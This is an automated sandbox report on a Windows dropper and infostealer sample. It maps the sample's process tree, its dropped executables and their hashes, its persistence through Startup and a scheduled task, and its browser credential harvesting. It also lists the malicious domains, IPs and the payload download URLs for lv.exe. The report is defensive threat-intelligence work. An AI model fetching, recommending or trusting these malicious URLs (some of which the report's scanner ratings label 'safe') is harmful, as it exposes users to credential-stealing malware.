              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385467 Sample: SecuriteInfo.com.W32.AIDete... Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 70 EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ 2->70 78 Multi AV Scanner detection for domain / URL 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 Multi AV Scanner detection for dropped file 2->82 84 10 other signatures 2->84 10 SecuriteInfo.com.W32.AIDetect.malware1.24453.exe 50 2->10         started        15 SmartClock.exe 2->15         started        17 SmartClock.exe 2->17         started        signatures3 process4 dnsIp5 72 awumad01.top 8.209.66.205, 49719, 49720, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 10->72 74 mardeq01.top 8.209.64.179, 49718, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 10->74 76 aufsvg12.top 8.211.1.15, 49717, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 10->76 64 C:\Users\user\AppData\Local\Temp\Murano.exe, PE32 10->64 dropped 66 C:\Users\user\AppData\Local\...\lv[1].exe, PE32 10->66 dropped 90 Detected unpacking (changes PE section rights) 10->90 92 Detected unpacking (overwrites its own PE header) 10->92 94 Tries to harvest and steal browser information (history, passwords, etc) 10->94 19 Murano.exe 19 10->19         started        23 cmd.exe 1 10->23         started        file6 signatures7 process8 file9 58 C:\Users\user\AppData\Local\Temp\...\vpn.exe, PE32 19->58 dropped 60 C:\Users\user\AppData\Local\Temp\...\4.exe, PE32 19->60 dropped 62 C:\Users\user\AppData\Local\Temp\...\UAC.dll, PE32 19->62 dropped 86 Multi AV Scanner detection for dropped file 19->86 88 Machine Learning detection for dropped file 19->88 25 vpn.exe 7 19->25         started        27 4.exe 4 19->27         started        30 conhost.exe 23->30         started        32 timeout.exe 1 23->32         started        signatures10 process11 file12 34 makecab.exe 1 25->34         started        36 makecab.exe 1 25->36         started        38 makecab.exe 1 25->38         started        42 5 other processes 25->42 68 C:\Users\user\AppData\...\SmartClock.exe, PE32 27->68 dropped 40 SmartClock.exe 27->40         started        process13 process14 44 conhost.exe 34->44         started        46 conhost.exe 36->46         started        48 conhost.exe 38->48         started        50 conhost.exe 42->50         started        52 conhost.exe 42->52         started        54 conhost.exe 42->54         started        56 2 other processes 42->56

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.W32.AIDetect.malware1.24453.exe31%VirustotalBrowse
              SecuriteInfo.com.W32.AIDetect.malware1.24453.exe33%ReversingLabsWin32.Dropper.Generic
              SecuriteInfo.com.W32.AIDetect.malware1.24453.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\New Feature\4.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\Murano.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe31%ReversingLabsWin32.Dropper.Scrop
              C:\Users\user\AppData\Local\Temp\Murano.exe31%ReversingLabsWin32.Dropper.Scrop
              C:\Users\user\AppData\Local\Temp\New Feature\4.exe38%ReversingLabsWin32.Dropper.Scrop
              C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe15%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll0%ReversingLabs
              C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe38%ReversingLabsWin32.Dropper.Scrop

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              18.1.vpn.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.4201e90.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              awumad01.top7%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://aufsvg12.top/index.php0%Avira URL Cloudsafe
              http://mardeq01.top/index.php0%Avira URL Cloudsafe
              http://aufsvg12.top/index.php)0%Avira URL Cloudsafe
              http://awumad01.top/download.php?file=lv.exeopenBOOLEANBIT0%Avira URL Cloudsafe
              http://www.avast.com0/0%Avira URL Cloudsafe
              http://awumad01.top/downfiles/lv.exe0%Avira URL Cloudsafe
              http://awumad01.top/download.php?file=lv.exeqEaRrk0%Avira URL Cloudsafe
              http://www.avast.com00%Avira URL Cloudsafe
              http://aufsvg12.top/index.phpz0%Avira URL Cloudsafe
              http://awumad01.top/download.php?file=lv.exe0%Avira URL Cloudsafe
              http://awumad01.top/download.php?file=lv.exeskQ0%Avira URL Cloudsafe
              http://awumad01.top/downfiles/lv.exeaC:0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              mardeq01.top
              8.209.64.179
              truefalse
                unknown
                awumad01.top
                8.209.66.205
                truetrueunknown
                aufsvg12.top
                8.211.1.15
                truefalse
                  unknown
                  EiodCJGkPupHarewIHgoYXhjJQvRZ.EiodCJGkPupHarewIHgoYXhjJQvRZ
                  unknown
                  unknownfalse
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://aufsvg12.top/index.phpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://mardeq01.top/index.phpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://awumad01.top/downfiles/lv.exetrue
                    • Avira URL Cloud: safe
                    unknown
                    http://awumad01.top/download.php?file=lv.exetrue
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ac.ecosia.org/autocomplete?q=SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drfalse
                      high
                      https://duckduckgo.com/chrome_newtabSecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drfalse
                        high
                        https://duckduckgo.com/ac/?q=SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drfalse
                          high
                          http://aufsvg12.top/index.php)SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://awumad01.top/download.php?file=lv.exeopenBOOLEANBITSecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drfalse
                            high
                            http://www.autoitscript.com/autoit3/Xvpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drfalse
                              high
                              http://www.avast.com0/Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchSecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drfalse
                                high
                                http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377165659.0000000005CD9000.00000004.00000001.sdmp, Murano.exe, 0000000D.00000000.381399655.0000000000409000.00000002.00020000.sdmp, Murano.exe.0.drfalse
                                  high
                                  https://www.autoitscript.com/autoit3/vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drfalse
                                    high
                                    http://awumad01.top/download.php?file=lv.exeqEaRrkSecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.avast.com0Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drfalse
                                      high
                                      http://aufsvg12.top/index.phpzSecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://awumad01.top/download.php?file=lv.exeskQSecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.237850917.0000000004212000.00000004.00000001.sdmp, cmZpVs.tmp.0.drfalse
                                        high
                                        http://awumad01.top/downfiles/lv.exeaC:SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        8.209.66.205
                                        awumad01.topSingapore
                                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                        8.211.1.15
                                        aufsvg12.topSingapore
                                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                        8.209.64.179
                                        mardeq01.topSingapore
                                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:385467
                                        Start date:12.04.2021
                                        Start time:15:10:19
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 31s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:SecuriteInfo.com.W32.AIDetect.malware1.24453.7436 (renamed file extension from 7436 to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:40
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@41/35@5/3
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 50.4% (good quality ratio 47%)
                                        • Quality average: 79.4%
                                        • Quality standard deviation: 29.6%
                                        HCA Information:
                                        • Successful, ratio: 68%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 20.82.209.104, 131.253.33.200, 13.107.22.200, 93.184.220.29, 104.43.139.144, 92.122.145.220, 168.61.161.212, 104.43.193.48, 104.42.151.234, 23.57.80.111, 13.107.5.88, 13.107.42.23, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 20.82.210.154, 20.54.26.129
                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net, skypedataprdcolwus16.cloudapp.net
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        15:12:17API Interceptor1x Sleep call for process: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe modified
                                        15:12:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk
                                        15:12:28Task SchedulerRun new task: Smart Clock path: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        mardeq01.topfile.exeGet hashmaliciousBrowse
                                        • 34.116.248.73
                                        C++ Dropper.exeGet hashmaliciousBrowse
                                        • 34.116.248.73
                                        awumad01.topfile.exeGet hashmaliciousBrowse
                                        • 35.228.166.216
                                        aufsvg12.topfile.exeGet hashmaliciousBrowse
                                        • 34.118.72.185
                                        C++ Dropper.exeGet hashmaliciousBrowse
                                        • 34.118.72.185

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCmy_attach_00968.vbsGet hashmaliciousBrowse
                                        • 8.210.83.250
                                        tDDFLIR3f6.exeGet hashmaliciousBrowse
                                        • 8.209.68.164
                                        document-1429954472.xlsGet hashmaliciousBrowse
                                        • 47.244.191.15
                                        document-1429954472.xlsGet hashmaliciousBrowse
                                        • 47.244.191.15
                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        BvuKqSpgIG.exeGet hashmaliciousBrowse
                                        • 198.11.132.10
                                        3vQD6TIYA1.exeGet hashmaliciousBrowse
                                        • 8.209.67.151
                                        wininit.dllGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        XN123gfQJQ.exeGet hashmaliciousBrowse
                                        • 8.209.67.151
                                        0408_391585988029.docGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        msals.pumpl.dllGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        BrgW593cHH.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        BrgW593cHH.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        WDnE51mua6.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        documents-2112491607.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1660683173.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        0406_37400496097832.docGet hashmaliciousBrowse
                                        • 8.208.95.92
                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCmy_attach_00968.vbsGet hashmaliciousBrowse
                                        • 8.210.83.250
                                        tDDFLIR3f6.exeGet hashmaliciousBrowse
                                        • 8.209.68.164
                                        document-1429954472.xlsGet hashmaliciousBrowse
                                        • 47.244.191.15
                                        document-1429954472.xlsGet hashmaliciousBrowse
                                        • 47.244.191.15
                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        BvuKqSpgIG.exeGet hashmaliciousBrowse
                                        • 198.11.132.10
                                        3vQD6TIYA1.exeGet hashmaliciousBrowse
                                        • 8.209.67.151
                                        wininit.dllGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        XN123gfQJQ.exeGet hashmaliciousBrowse
                                        • 8.209.67.151
                                        0408_391585988029.docGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        msals.pumpl.dllGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        BrgW593cHH.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        BrgW593cHH.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        WDnE51mua6.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        documents-2112491607.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1660683173.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        0406_37400496097832.docGet hashmaliciousBrowse
                                        • 8.208.95.92
                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCmy_attach_00968.vbsGet hashmaliciousBrowse
                                        • 8.210.83.250
                                        tDDFLIR3f6.exeGet hashmaliciousBrowse
                                        • 8.209.68.164
                                        document-1429954472.xlsGet hashmaliciousBrowse
                                        • 47.244.191.15
                                        document-1429954472.xlsGet hashmaliciousBrowse
                                        • 47.244.191.15
                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        BvuKqSpgIG.exeGet hashmaliciousBrowse
                                        • 198.11.132.10
                                        3vQD6TIYA1.exeGet hashmaliciousBrowse
                                        • 8.209.67.151
                                        wininit.dllGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        XN123gfQJQ.exeGet hashmaliciousBrowse
                                        • 8.209.67.151
                                        0408_391585988029.docGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        msals.pumpl.dllGet hashmaliciousBrowse
                                        • 8.208.88.90
                                        BrgW593cHH.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        BrgW593cHH.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        WDnE51mua6.exeGet hashmaliciousBrowse
                                        • 8.208.95.18
                                        documents-2112491607.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        documents-1660683173.xlsmGet hashmaliciousBrowse
                                        • 8.211.4.209
                                        0406_37400496097832.docGet hashmaliciousBrowse
                                        • 8.208.95.92

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dllSecuriteInfo.com.ArtemisAFF6F8C75217.6228.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            tDDFLIR3f6.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.Trojan.Agent.FFIJ.17175.exeGet hashmaliciousBrowse
                                                3vQD6TIYA1.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Trojan.Coins.Win32.5986.15363.exeGet hashmaliciousBrowse
                                                    XN123gfQJQ.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Trojan.PWS.Siggen2.64388.32153.exeGet hashmaliciousBrowse
                                                        V7UnYc7CCN.exeGet hashmaliciousBrowse
                                                          FileZilla_3.53.1_win64_sponsored-setup.exeGet hashmaliciousBrowse
                                                            FileZilla_3.53.1_win64_sponsored-setup.exeGet hashmaliciousBrowse
                                                              1Nqs1iTfMz.exeGet hashmaliciousBrowse
                                                                lv.exeGet hashmaliciousBrowse
                                                                  IaYA2iuuIV.exeGet hashmaliciousBrowse
                                                                    Ypp2jYNpAI.exeGet hashmaliciousBrowse
                                                                      1k2RZQrqkh.exeGet hashmaliciousBrowse
                                                                        JspemsXAtV.exeGet hashmaliciousBrowse
                                                                          3688975dcd3f7829cfe55f7dd46166e0d6bd46c842c16.exeGet hashmaliciousBrowse
                                                                            hLOTlwUNup.exeGet hashmaliciousBrowse
                                                                              vZzN8hoqnD.exeGet hashmaliciousBrowse
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exefile.exeGet hashmaliciousBrowse
                                                                                  C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeSecuriteInfo.com.ArtemisAFF6F8C75217.6228.exeGet hashmaliciousBrowse
                                                                                    file.exeGet hashmaliciousBrowse
                                                                                      C:\Users\user\AppData\Local\Temp\New Feature\4.exeSecuriteInfo.com.ArtemisAFF6F8C75217.6228.exeGet hashmaliciousBrowse
                                                                                        file.exeGet hashmaliciousBrowse
                                                                                          C:\Users\user\AppData\Local\Temp\Murano.exefile.exeGet hashmaliciousBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:downloaded
                                                                                            Size (bytes):1257147
                                                                                            Entropy (8bit):7.935226985820231
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:40gbfdhi0JFnqgMTCVAJGstzWentOPwCKIdNyt58e44H4EQXcgZAf7qrBWVt80z/:DC1hVnq3xJN/tLCH28e440p50f83y
                                                                                            MD5:AFF6F8C7521796D3BC8FC1059DBE2409
                                                                                            SHA1:EAA8368B259BEB696D45BA1A69B75BC0D99C8BC9
                                                                                            SHA-256:826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
                                                                                            SHA-512:CF3DE72146E5E3F2EFAD7AC2982DF23F92FA46297C7F161BAC38D227ECCD35A728A36D90583BDAF81CE5B7427CB108D692D81E2048A6A85115A09A4228F7A64C
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 31%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            IE Cache URL:http://awumad01.top/downfiles/lv.exe
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................................@.................................@................................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\Murano.exe
                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1257147
                                                                                            Entropy (8bit):7.935226985820231
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:40gbfdhi0JFnqgMTCVAJGstzWentOPwCKIdNyt58e44H4EQXcgZAf7qrBWVt80z/:DC1hVnq3xJN/tLCH28e440p50f83y
                                                                                            MD5:AFF6F8C7521796D3BC8FC1059DBE2409
                                                                                            SHA1:EAA8368B259BEB696D45BA1A69B75BC0D99C8BC9
                                                                                            SHA-256:826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
                                                                                            SHA-512:CF3DE72146E5E3F2EFAD7AC2982DF23F92FA46297C7F161BAC38D227ECCD35A728A36D90583BDAF81CE5B7427CB108D692D81E2048A6A85115A09A4228F7A64C
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 31%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...z...B...8............@.......................................@.................................@................................`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\New Feature\4.exe
                                                                                            Process:C:\Users\user\AppData\Local\Temp\Murano.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):328704
                                                                                            Entropy (8bit):6.796040916616973
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:TTxj9L+GunafsHK8zIjIVp20bhPeCPHhNX:TTxJzBsq8kJ07H
                                                                                            MD5:E99CED09C77FFEC9F09B33642E9B0E99
                                                                                            SHA1:01217AD74FDCFE07F1EA0FE296AB4D2B809CD581
                                                                                            SHA-256:02F5996141F5FE2B189D8E2B1556EAB985E55E91D9F476DABC691F7C693B2400
                                                                                            SHA-512:F4D515C7E920B30E7E12EB6BC77E0446F31286259804BAEFD1B33A338CFF9DB6E688173E59A7110F11298199646F31EEC8934E502F130AF5FC765E02FC543186
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: SecuriteInfo.com.ArtemisAFF6F8C75217.6228.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L.....^_...........................=-............@..........................0....../z..............................Pf..j....[..<....p..0...........................................................hJ..@............ ...............................text...?........................... ..`.data...<..........................@....yiku..............................@....padozocy...........................@....new.....F... ...H..................@..@.rsrc...0....p.......X..............@..@.reloc...............p..............@..B................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
                                                                                            Process:C:\Users\user\AppData\Local\Temp\Murano.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):1146832
                                                                                            Entropy (8bit):7.423293036564585
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:lJz439QdUleuKsh4rn8S4FmIHANyl5Le4zHfEbXcgHXk7MeBWOs80cIykyJcPwbJ:lx4tQdU8r8S2mNiLe4zyH60WLJcPO
                                                                                            MD5:0FDA9A85AEDF1487A6D58E4031F72E2D
                                                                                            SHA1:63A31D82F17E074BB355467D7BAFFA59A3206360
                                                                                            SHA-256:1A584D3F6C556EF5B10AEE7D057ADAB2EFFE774D1E85B19FF108899BC84371F3
                                                                                            SHA-512:4BB1C71395441F9401DCDE85DDBB8A8F4ADC6F88F280E78E30E327A6E4D16ABE40D99D63E6613A5387A33E9AC9FC68432A7AF4B125C8DBAE3712BBD955439F48
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 15%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: SecuriteInfo.com.ArtemisAFF6F8C75217.6228.exe, Detection: malicious, Browse
                                                                                            • Filename: file.exe, Detection: malicious, Browse
